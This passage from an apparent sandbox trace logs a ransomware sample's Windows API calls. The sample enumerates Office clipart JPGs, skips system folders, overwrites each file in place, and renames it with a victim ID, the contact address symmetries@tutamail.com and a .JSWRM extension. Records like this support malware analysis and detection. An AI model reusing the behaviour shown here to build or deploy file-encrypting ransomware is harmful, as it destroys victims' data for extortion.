(lpString1="J0382965.JPG", lpString2="windows") returned -1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="recovery") returned -1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="perflogs") returned -1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="documents and settings") returned 1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="system volume information") returned -1 [0090.275] lstrcmpiW (lpString1="J0382965.JPG", lpString2="msocache") returned -1 [0090.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0090.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382965.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382965.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382965.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0090.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0090.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382965.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382965.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382965.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0090.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0090.276] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0090.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.276] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0090.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382965.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.470] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113410) returned 1 [0090.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.470] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1bb00) returned 0x24d210 [0090.471] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1bb00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1bb00, lpOverlapped=0x0) returned 1 [0090.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.480] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1bb00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1bb00, lpOverlapped=0x0) returned 1 [0090.480] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.481] CloseHandle (hObject=0x314) returned 1 [0090.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0090.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0090.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0090.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0090.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0090.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0090.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0090.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0090.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.482] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382965.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382965.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382965.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0090.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0090.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0090.483] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf511e53, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf511e53, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382966.JPG", cAlternateFileName="")) returned 1 [0090.483] lstrcmpiW (lpString1="J0382966.JPG", lpString2=".") returned 1 [0090.483] lstrcmpiW (lpString1="J0382966.JPG", lpString2="..") returned 1 [0090.483] lstrcmpiW (lpString1="J0382966.JPG", lpString2="...") returned 1 [0090.483] lstrcmpiW (lpString1="J0382966.JPG", lpString2="windows") returned -1 [0090.483] lstrcmpiW (lpString1="J0382966.JPG", lpString2="recovery") returned -1 [0090.483] lstrcmpiW (lpString1="J0382966.JPG", lpString2="perflogs") returned -1 [0090.484] lstrcmpiW (lpString1="J0382966.JPG", lpString2="documents and settings") returned 1 [0090.484] lstrcmpiW (lpString1="J0382966.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.484] lstrcmpiW (lpString1="J0382966.JPG", lpString2="system volume information") returned -1 [0090.484] lstrcmpiW (lpString1="J0382966.JPG", lpString2="msocache") returned -1 [0090.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0090.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382966.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382966.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382966.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0090.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0090.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382966.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382966.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382966.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0090.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0090.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0090.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0090.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382966.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.485] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=100488) returned 1 [0090.485] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18880) returned 0x24d210 [0090.486] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x18880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x18880, lpOverlapped=0x0) returned 1 [0090.494] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.494] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x18880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x18880, lpOverlapped=0x0) returned 1 [0090.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.495] CloseHandle (hObject=0x314) returned 1 [0090.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0090.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0090.495] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0090.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0090.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0090.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0090.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0090.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0090.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0090.496] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0090.496] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382966.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382966.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382966.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0090.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0090.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0090.497] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf511e53, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16d08, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382967.JPG", cAlternateFileName="")) returned 1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2=".") returned 1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="..") returned 1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="...") returned 1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="windows") returned -1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="recovery") returned -1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="perflogs") returned -1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="documents and settings") returned 1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="system volume information") returned -1 [0090.497] lstrcmpiW (lpString1="J0382967.JPG", lpString2="msocache") returned -1 [0090.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0090.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382967.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382967.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382967.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0090.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0090.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382967.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382967.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382967.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0090.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0090.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0090.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0090.497] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0090.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0090.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382967.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0090.498] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=93448) returned 1 [0090.498] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.498] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x16d00) returned 0x24d210 [0090.499] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x16d00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x16d00, lpOverlapped=0x0) returned 1 [0090.507] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.507] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x16d00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x16d00, lpOverlapped=0x0) returned 1 [0090.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.508] CloseHandle (hObject=0x314) returned 1 [0090.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0090.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0090.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0090.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0090.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0090.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0090.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.509] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382967.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382967.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382967.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0090.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0090.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0090.510] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ebbf4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4ebbf4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4ebbf4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b75f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382968.JPG", cAlternateFileName="")) returned 1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2=".") returned 1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="..") returned 1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="...") returned 1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="windows") returned -1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="recovery") returned -1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="perflogs") returned -1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="documents and settings") returned 1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="system volume information") returned -1 [0090.510] lstrcmpiW (lpString1="J0382968.JPG", lpString2="msocache") returned -1 [0090.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0090.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382968.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382968.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382968.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0090.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0090.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382968.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382968.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382968.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0090.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0090.510] HeapFree 